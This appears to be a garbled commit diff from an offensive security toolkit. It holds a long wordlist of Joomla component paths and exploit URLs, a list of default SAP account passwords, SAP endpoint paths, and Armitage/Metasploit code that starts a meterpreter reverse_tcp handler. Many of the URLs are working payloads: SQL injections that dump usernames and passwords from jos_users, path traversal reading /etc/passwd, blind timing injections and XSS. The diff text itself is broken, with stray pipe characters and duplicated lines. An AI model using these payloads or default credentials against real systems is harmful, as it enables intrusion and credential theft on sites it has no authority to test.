components/com_noticias/
|
||||
components/com_omnirealestate/
|
||||
components/com_omphotogallery/
|
||||
components/com_ongumatimesheet20/
|
||||
components/com_onlineflashquiz/
|
||||
components/com_ownbiblio/
|
||||
components/com_panoramic/
|
||||
components/com_paxgallery/
|
||||
components/com_paxxgallery/
|
||||
components/com_pcchess/
|
||||
components/com_pcchess/include.pcchess.php
|
||||
components/com_pccookbook/
|
||||
components/com_pccookbook/pccookbook.php
|
||||
components/com_peoplebook/param.peoplebook.php
|
||||
components/com_performs/
|
||||
components/com_philaform/
|
||||
components/com_phocadocumentation/
|
||||
components/com_php/
|
||||
components/com_phpshop/toolbar.phpshop.html.php
|
||||
components/com_pinboard/
|
||||
components/com_pms/
|
||||
components/com_poll/
|
||||
components/com_pollxt/
|
||||
components/com_ponygallery/
|
||||
components/com_portafolio/
|
||||
components/com_portfol/
|
||||
components/com_prayercenter/
|
||||
components/com_pro_desk/
|
||||
components/com_prod/
|
||||
components/com_productshowcase/
|
||||
components/com_profiler/
|
||||
components/com_projectfork/
|
||||
components/com_propertylab/
|
||||
components/com_puarcade/
|
||||
components/com_publication/
|
||||
components/com_quiz/
|
||||
components/com_rapidrecipe/
|
||||
components/com_rdautos/
|
||||
components/com_realestatemanager/
|
||||
components/com_recly/
|
||||
components/com_referenzen/
|
||||
components/com_rekry/
|
||||
components/com_remository/admin.remository.php
|
||||
components/com_remository_files/file_image_14/1276100016shell.php
|
||||
components/com_reporter/processor/reporter.sql.php
|
||||
components/com_resman/
|
||||
components/com_restaurante/
|
||||
components/com_ricette/
|
||||
components/com_rsfiles/
|
||||
components/com_rsgallery/
|
||||
components/com_rsgallery2/
|
||||
components/com_rss/
|
||||
components/com_rssreader/
|
||||
components/com_rssxt/
|
||||
components/com_rwcards/
|
||||
components/com_school/
|
||||
components/com_search/
|
||||
components/com_sebercart/getPic.php?p=[LFD]%00
|
||||
components/com_securityimages/
|
||||
components/com_sef/
|
||||
components/com_seminar/
|
||||
components/com_serverstat/install.serverstat.php
|
||||
components/com_sg/
|
||||
components/com_simple_review/
|
||||
components/com_simpleboard/
|
||||
components/com_simplefaq/
|
||||
components/com_simpleshop/
|
||||
components/com_sitemap/sitemap.xml.php
|
||||
components/com_slideshow/
|
||||
components/com_smf/
|
||||
components/com_smf/smf.php
|
||||
components/com_swmenupro/
|
||||
components/com_team/
|
||||
components/com_tech_article/
|
||||
components/com_thopper/
|
||||
components/com_thyme/
|
||||
components/com_tickets/
|
||||
components/com_tophotelmodule/
|
||||
components/com_tour_toto/
|
||||
components/com_trade/
|
||||
components/com_uhp/
|
||||
components/com_uhp2/
|
||||
components/com_user/controller.php
|
||||
components/com_users/
|
||||
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
|
||||
components/com_vehiclemanager/
|
||||
components/com_versioning /
|
||||
components/com_videodb/core/videodb.class.xml.php
|
||||
components/com_virtuemart/
|
||||
components/com_volunteer/
|
||||
components/com_vr/
|
||||
components/com_waticketsystem/
|
||||
components/com_webhosting/
|
||||
components/com_weblinks/
|
||||
components/com_webring/
|
||||
components/com_wmtgallery/
|
||||
components/com_wmtportfolio/
|
||||
components/com_x-shop/
|
||||
components/com_xevidmegahd/
|
||||
components/com_xewebtv/
|
||||
components/com_xfaq/
|
||||
components/com_xgallery/helpers/img.php?file=
|
||||
components/com_xsstream-dm/
|
||||
components/com_ynews/
|
||||
components/com_yvcomment/
|
||||
components/com_zoom/classes/
|
||||
components/mod_letterman/
|
||||
components/remository/
|
||||
eXtplorer/
|
||||
easyblog/entry/uncategorized
|
||||
extplorer/
|
||||
components/com_mtree/img/listings/o/{id}.php where {id}
|
||||
includes/joomla.php
|
||||
index.php/404'
|
||||
index.php/?option=com_question&catID=21' and+1=0 union all
|
||||
index.php/image-gallery/"><script>alert('xss')</script>/25-koala
|
||||
index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
|
||||
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
|
||||
index.php?option=com_aardvertiser&cat_name=conf&task=<=
|
||||
index.php?option=com_aardvertiser&task=
|
||||
index.php?option=com_abc&view=abc&letter=AS§ionid='
|
||||
index.php?option=com_advert&id=36'
|
||||
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
|
||||
index.php?option=com_alfurqan15x&action=viewayat&surano=
|
||||
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
|
||||
index.php?option=com_annonces&view=edit&Itemid=1
|
||||
index.php?option=com_articleman&task=new
|
||||
index.php?option=com_bbs&bid=-1
|
||||
index.php?option=com_beamospetition&startpage=3&pet=-
|
||||
index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
|
||||
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
|
||||
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
|
||||
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
|
||||
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
|
||||
index.php?option=com_chronoconnectivity&itemid=1
|
||||
index.php?option=com_chronocontact&itemid=1
|
||||
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
|
||||
index.php?option=com_clantools&squad=1+
|
||||
index.php?option=com_clantools&task=clanwar&showgame=1+
|
||||
index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
|
||||
index.php?option=com_commedia&task=page&commpid=21
|
||||
index.php?option=com_connect&view=connect&controller=
|
||||
index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
|
||||
index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_dioneformwizard&controller=[LFI]%00
|
||||
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
|
||||
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
|
||||
index.php?option=com_easyfaq&Itemid=1&task=view&gid=
|
||||
index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
|
||||
index.php?option=com_easyfaq&task=view&contact_id=
|
||||
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
|
||||
index.php?option=com_equipment&task=components&id=45&sec_men_id=
|
||||
index.php?option=com_equipment&view=details&id=
|
||||
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
|
||||
index.php?option=com_etree&view=displays&layout=category&id=[SQL]
|
||||
index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
|
||||
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
|
||||
index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
|
||||
index.php?option=com_filecabinet&task=download&cid[]=7
|
||||
index.php?option=com_firmy&task=section_show_set&Id=-1
|
||||
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
|
||||
index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
|
||||
index.php?option=com_graphics&controller=
|
||||
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
|
||||
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
|
||||
index.php?option=com_huruhelpdesk&view=detail
|
||||
index.php?option=com_huruhelpdesk&view=detail&cid[0]=
|
||||
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
|
||||
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
|
||||
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
|
||||
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
|
||||
index.php?option=com_iproperty&view=agentproperties&id=
|
||||
index.php?option=com_jacomment&view=
|
||||
index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_jcommunity&controller=members&task=1'
|
||||
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
|
||||
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
|
||||
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
|
||||
index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
|
||||
index.php?option=com_jfuploader&Itemid=
|
||||
index.php?option=com_jgen&task=view&id=
|
||||
index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_jimtawl&Itemid=12&task=
|
||||
index.php?option=com_jmarket&controller=product&task=1'
|
||||
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
|
||||
index.php?option=com_jomdirectory&task=search&type=111+
|
||||
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
|
||||
index.php?option=com_joomla_flash_uploader&Itemid=1
|
||||
index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
|
||||
index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
|
||||
index.php?option=com_joomtouch&controller=
|
||||
index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
|
||||
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
|
||||
index.php?option=com_jstore&controller=product-display&task=1'
|
||||
index.php?option=com_jsubscription&controller=subscription&task=1'
|
||||
index.php?option=com_jtickets&controller=ticket&task=1'
|
||||
index.php?option=com_konsultasi&act=detail&sid=
|
||||
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
|
||||
index.php?option=com_kunena&func=userlist&search=
|
||||
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
|
||||
index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
|
||||
index.php?option=com_matamko&controller=
|
||||
index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
|
||||
index.php?option=com_neorecruit&task=offer_view&id=
|
||||
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
|
||||
index.php?option=com_noticeboard&controller=
|
||||
index.php?option=com_obsuggest&controller=
|
||||
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
|
||||
index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
|
||||
index.php?option=com_oziogallery&Itemid=
|
||||
index.php?option=com_page&id=53
|
||||
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
|
||||
index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
|
||||
index.php?option=com_phocagallery&view=categories&Itemid=
|
||||
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||
index.php?option=com_php&file=../../../../../../../../../../etc/passwd
|
||||
index.php?option=com_php&file=../images/phplogo.jpg
|
||||
index.php?option=com_php&file=../js/ie_pngfix.js
|
||||
index.php?option=com_ponygallery&Itemid=[sqli]
|
||||
index.php?option=com_products&catid=-1
|
||||
index.php?option=com_products&id=-1
|
||||
index.php?option=com_products&product_id=-1
|
||||
index.php?option=com_products&task=category&catid=-1
|
||||
index.php?option=com_properties&task=agentlisting&aid=
|
||||
index.php?option=com_qcontacts&Itemid=1'
|
||||
index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
|
||||
index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_restaurantguide&view=country&id='&Itemid=69
|
||||
index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
|
||||
index.php?option=com_seyret&view=
|
||||
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
|
||||
index.php?option=com_smartsite&controller=
|
||||
index.php?option=com_spa&view=spa_product&cid=
|
||||
index.php?option=com_spidercalendar
|
||||
index.php?option=com_spidercalendar&date=1'
|
||||
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||
index.php?option=com_staticxt&staticfile=test.php&id=1923
|
||||
index.php?option=com_szallasok&mode=8&id=25 (SQL)
|
||||
index.php?option=com_tag&task=tag&tag=
|
||||
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
|
||||
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
|
||||
index.php?option=com_ultimateportfolio&controller=
|
||||
index.php?option=com_users&view=registration
|
||||
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
|
||||
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_x-shop&action=artdetail&idd='
|
||||
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
|
||||
index.php?option=com_xcomp&controller=../../[LFI]%00
|
||||
index.php?option=com_xvs&controller=../../[LFI]%00
|
||||
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
|
||||
index.php?option=com_yjcontactus&view=
|
||||
index.php?option=com_youtube&id_cate=4
|
||||
index.php?option=com_zina&view=zina&Itemid=9
|
||||
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
|
||||
index.php?search=NoGe&option=com_esearch&searchId=
|
||||
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
|
||||
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
|
||||
js/index.php?option=com_socialads&view=showad&Itemid=94
|
||||
libraries/joomla/utilities/compat/php50x.php
|
||||
libraries/pcl/pcltar.php
|
||||
libraries/phpmailer/phpmailer.php
|
||||
libraries/phpxmlrpc/xmlrpcs.php
|
||||
modules/mod_artuploader/upload.php");
|
||||
modules/mod_as_category.php
|
||||
modules/mod_calendar.php
|
||||
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
|
||||
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
|
||||
modules/mod_jfancy/script.php");
|
||||
modules/mod_ppc_simple_spotlight/elements/upload_file.php
|
||||
modules/mod_ppc_simple_spotlight/img/
|
||||
modules/mod_pxt/
|
||||
modules/mod_quick_question.php
|
||||
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
|
||||
patch/makedown.php?arquivo=../../../../etc/passwd
|
||||
plugins/content/efup_files/helper.php");
|
||||
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
|
||||
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
|
||||
plugins/editors/xstandard/attachmentlibrary.php
|
||||
print.php?task=person&id=36 and 1=1
|
||||
templates/be2004-2/
|
||||
templates/ja_purity/
|
||||
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
|
||||
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
|
|
@ -12,3 +12,7 @@ ADS_AGENT ch4ngeme
|
|||
DEVELOPER ch4ngeme
|
||||
J2EE_ADMIN ch4ngeme
|
||||
SAPJSF ch4ngeme
|
||||
SAPR3 SAP
|
||||
CTB_ADMIN sap123
|
||||
XMI_DEMO sap123
|
||||
|
||||
|
|
|
@ -93,11 +93,11 @@
|
|||
/rwb/version.html
|
||||
/sap/admin
|
||||
/sap/bc/bsp/esh_os_service/favicon.gif
|
||||
/sap/bc/bsp/sap
|
||||
/sap/bc/bsp/sap
|
||||
/sap/bc/bsp/sap/alertinbox
|
||||
/sap/bc/bsp/sap/bsp_dlc_frcmp
|
||||
/sap/bc/bsp/sap/bsp_veri
|
||||
/sap/bc/bsp/sap/bsp_verificatio
|
||||
/sap/bc/bsp/sap/bsp_verificatio
|
||||
/sap/bc/bsp/sap/bsp_wd_base
|
||||
/sap/bc/bsp/sap/bspwd_basics
|
||||
/sap/bc/bsp/sap/certmap
|
||||
|
@ -116,31 +116,46 @@
|
|||
/sap/bc/bsp/sap/graph_bsp_test
|
||||
/sap/bc/bsp/sap/graph_bsp_test/Mimes
|
||||
/sap/bc/bsp/sap/gsbirp
|
||||
/sap/bc/bsp/sap/htmlb_samples
|
||||
/sap/bc/bsp/sap/hrrcf_wd_dovru
|
||||
/sap/bc/bsp/sap/htmlb_samples
|
||||
/sap/bc/bsp/sap/iccmp_bp_cnfirm
|
||||
/sap/bc/bsp/sap/iccmp_hdr_cntnr
|
||||
/sap/bc/bsp/sap/iccmp_hdr_cntnt
|
||||
/sap/bc/bsp/sap/iccmp_header
|
||||
/sap/bc/bsp/sap/iccmp_ssc_ll/
|
||||
/sap/bc/bsp/sap/ic_frw_notify
|
||||
/sap/bc/bsp/sap/it00
|
||||
/sap/bc/bsp/sap/public/bc
|
||||
/sap/bc/bsp/sap/it00
|
||||
/sap/bc/bsp/sap/it00/default.htm
|
||||
/sap/bc/bsp/sap/it00/http_client.htm
|
||||
/sap/bc/bsp/sap/it00/http_client_xml.htm
|
||||
/sap/bc/bsp/sap/public/bc
|
||||
/sap/bc/bsp/sap/public/graphics
|
||||
/sap/bc/bsp/sap/sam_demo
|
||||
/sap/bc/bsp/sap/sam_notifying
|
||||
/sap/bc/bsp/sap/sam_sess_queue
|
||||
/sap/bc/bsp/sap/sbspext_htmlb
|
||||
/sap/bc/bsp/sap/sbspext_xhtmlb
|
||||
/sap/bc/bsp/sap/sbspext_htmlb
|
||||
/sap/bc/bsp/sap/sbspext_xhtmlb
|
||||
/sap/bc/bsp/sap/spi_admin
|
||||
/sap/bc/bsp/sap/spi_monitor
|
||||
/sap/bc/bsp/sap/sxms_alertrules
|
||||
/sap/bc/bsp/sap/system
|
||||
/sap/bc/bsp/sap/system
|
||||
/sap/bc/bsp/sap/thtmlb_scripts
|
||||
/sap/bc/bsp/sap/thtmlb_styles
|
||||
/sap/bc/bsp/sap/uicmp_ltx
|
||||
/sap/bc/bsp/sap/xmb_bsp_log
|
||||
/sap/bc/contentserver
|
||||
/sap/bc/echo
|
||||
/sap/bc/erecruiting/applwzd
|
||||
/sap/bc/erecruiting/confirmation_e
|
||||
/sap/bc/erecruiting/confirmation_i
|
||||
/sap/bc/erecruiting/dataoverview
|
||||
/sap/bc/erecruiting/password
|
||||
/sap/bc/erecruiting/posting_apply
|
||||
/sap/bc/erecruiting/qa_email_e
|
||||
/sap/bc/erecruiting/qa_email_i
|
||||
/sap/bc/erecruiting/registration
|
||||
/sap/bc/erecruiting/startpage
|
||||
/sap/bc/erecruiting/verification
|
||||
/sap/bc/error
|
||||
/sap/bc/FormToRfc
|
||||
/sap/bc/graphics/net
|
||||
|
@ -165,10 +180,36 @@
|
|||
/sap/bc/webdynpro/sap/cnp_light_test
|
||||
/sap/bc/webdynpro/sap/configure_application
|
||||
/sap/bc/webdynpro/sap/configure_component
|
||||
/sap/bc/webdynpro/sap/esh_admin_ui_component
|
||||
/sap/bc/webdynpro/sap/esh_admin_ui_component
|
||||
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
|
||||
/sap/bc/webdynpro/sap/esh_eng_modelling
|
||||
/sap/bc/webdynpro/sap/esh_search_results.ui
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_ext
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_appls
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_applwizard
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_candidate_registration
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_candidate_verification
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_dataoverview
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_draft_applications
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_new_verif_mail
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_posting_apply
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_psett_ext
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_psett_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_extern
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_intern
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_qa_mss
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_req_assess
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_requi_monitor
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
|
||||
/sap/bc/webdynpro/sap/sh_adm_smoketest_files
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_appl
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_comp
|
||||
|
@ -196,11 +237,12 @@
|
|||
/sapmc/sapmc.html
|
||||
/sap/monitoring/
|
||||
/sap/public/bc
|
||||
/sap/public/bc
|
||||
/sap/public/bc/icons
|
||||
/sap/public/bc/icons_rtl
|
||||
/sap/public/bc/its
|
||||
/sap/public/bc/its/designs
|
||||
/sap/public/bc/its/mimes
|
||||
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
|
||||
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
|
||||
/sap/public/bc/its/mobile/itsmobile00
|
||||
/sap/public/bc/its/mobile/itsmobile01
|
||||
/sap/public/bc/its/mobile/rfid
|
||||
|
@ -211,8 +253,9 @@
|
|||
/sap/public/bc/pictograms
|
||||
/sap/public/bc/sicf_login_run
|
||||
/sap/public/bc/trex
|
||||
/sap/public/bc/ur
|
||||
/sap/public/bc/ur
|
||||
/sap/public/bc/wdtracetool
|
||||
/sap/public/bc/webdynpro
|
||||
/sap/public/bc/webdynpro/adobechallenge
|
||||
/sap/public/bc/webdynpro/mimes
|
||||
/sap/public/bc/webdynpro/ssr
|
||||
|
@ -220,16 +263,17 @@
|
|||
/sap/public/bc/webicons
|
||||
/sap/public/bc/workflow
|
||||
/sap/public/bc/workflow/shortcut
|
||||
/sap/public/bsp/sap
|
||||
/sap/public/bsp/sap/htmlb
|
||||
/sap/public/bsp/sap/public
|
||||
/sap/public/bsp/sap/public/bc
|
||||
/sap/public/bsp
|
||||
/sap/public/bsp/sap
|
||||
/sap/public/bsp/sap/htmlb
|
||||
/sap/public/bsp/sap/public
|
||||
/sap/public/bsp/sap/public/bc
|
||||
/sap/public/bsp/sap/public/faa
|
||||
/sap/public/bsp/sap/public/graphics
|
||||
/sap/public/bsp/sap/public/graphics/jnet_handler
|
||||
/sap/public/bsp/sap/public/graphics/mimes
|
||||
/sap/public/bsp/sap/system
|
||||
/sap/public/bsp/sap/system_public
|
||||
/sap/public/bsp/sap/system
|
||||
/sap/public/bsp/sap/system_public
|
||||
/sap/public/icf_check
|
||||
/sap/public/icf_info
|
||||
/sap/public/icf_info/icr_groups
|
||||
|
|
|
@ -16,6 +16,8 @@
|
|||
depend="yes"
|
||||
debug="true"
|
||||
optimize="yes"
|
||||
target="1.6"
|
||||
source="1.6"
|
||||
includeantruntime="fuckno"
|
||||
>
|
||||
<classpath path="./lib/jgraphx.jar;./lib/sleep.jar;./lib/msgpack-0.5.1-devel.jar;./lib/postgresql-9.1-901.jdbc4.jar" />
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
<center><h1>Armitage 1.45</h1></center>
|
||||
|
||||
<p>An attack management tool for Metasploit®
|
||||
<br />Release: 4 Jan 13</p>
|
||||
<br />Release: 12 Feb 13</p>
|
||||
<br />
|
||||
<p>Developed by:</p>
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@
|
|||
^msf (.*?)\((.*?)\) > \umsf\u $1(\c4$2\o) >
|
||||
^\[\*\] (.*) \cC[*]\o $1
|
||||
^\[\+\] (.*) \c9[+]\o $1
|
||||
^\[\!\] (.*) \c8[!]\o $1
|
||||
^\[\-\] (.*) \c4[-]\o $1
|
||||
^ =\[ (.*) =[\c7 $1
|
||||
^(=[=\s]+) \cE$1
|
||||
|
|
|
@ -0,0 +1,12 @@
|
|||
@echo off
|
||||
set BASE=$$BASE$$..\..\
|
||||
cd "%BASE%"
|
||||
set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH%
|
||||
IF NOT EXIST "%BASE%java" GOTO NO_JAVA
|
||||
set JAVA_HOME="%BASE%java"
|
||||
:NO_JAVA
|
||||
set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml"
|
||||
set MSF_BUNDLE_GEMS=0
|
||||
set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile
|
||||
cd "%BASE%apps\pro\msf3"
|
||||
rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$
|
|
@ -42,8 +42,13 @@ sub c_client {
|
|||
sub setupHandlers {
|
||||
find_job("Exploit: multi/handler", {
|
||||
if ($1 == -1) {
|
||||
# set LPORT for the user...
|
||||
local('$c');
|
||||
$c = call($client, "console.allocate")['id'];
|
||||
call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n");
|
||||
call($client, "console.release", $c);
|
||||
|
||||
# setup a handler for meterpreter
|
||||
call($client, "core.setg", "LPORT", randomPort());
|
||||
call($client, "module.execute", "exploit", "multi/handler", %(
|
||||
PAYLOAD => "windows/meterpreter/reverse_tcp",
|
||||
LHOST => "0.0.0.0",
|
||||
|
@ -55,7 +60,7 @@ sub setupHandlers {
|
|||
|
||||
sub main {
|
||||
global('$client $mclient');
|
||||
local('%r $exception');
|
||||
local('%r $exception $lhost $temp $c');
|
||||
|
||||
setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
|
||||
|
||||
|
@ -81,8 +86,24 @@ sub main {
|
|||
# setup second thread.
|
||||
%r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326);
|
||||
|
||||
# resolve lhost..
|
||||
$c = call($client, "console.allocate")['id'];
|
||||
call($client, "console.write", $c, "setg LHOST\n");
|
||||
while ($lhost eq "") {
|
||||
$temp = call($client, "console.read", $c)['data'];
|
||||
if (["$temp" startsWith: "LHOST => "]) {
|
||||
$lhost = substr(["$temp" trim], 9);
|
||||
}
|
||||
else {
|
||||
# this shouldn't happen because having LHOST set is a precondition
|
||||
# for Cortana to connect to a team server.
|
||||
sleep(1000);
|
||||
}
|
||||
}
|
||||
call($client, "console.release", $c);
|
||||
|
||||
# pass some objects back yo.
|
||||
[$loader passObjects: $client, $mclient];
|
||||
[$loader passObjects: $client, $mclient, $lhost];
|
||||
|
||||
# don't make previous messages available...
|
||||
call($mclient, "armitage.skip");
|
||||
|
|
|
@ -9,7 +9,10 @@ import msf.*;
|
|||
|
||||
# setg("varname", "value")
|
||||
sub setg {
|
||||
call_async("core.setg", $1, $2);
|
||||
if ($1 eq "LHOST") {
|
||||
call_async("armitage.set_ip", $2);
|
||||
}
|
||||
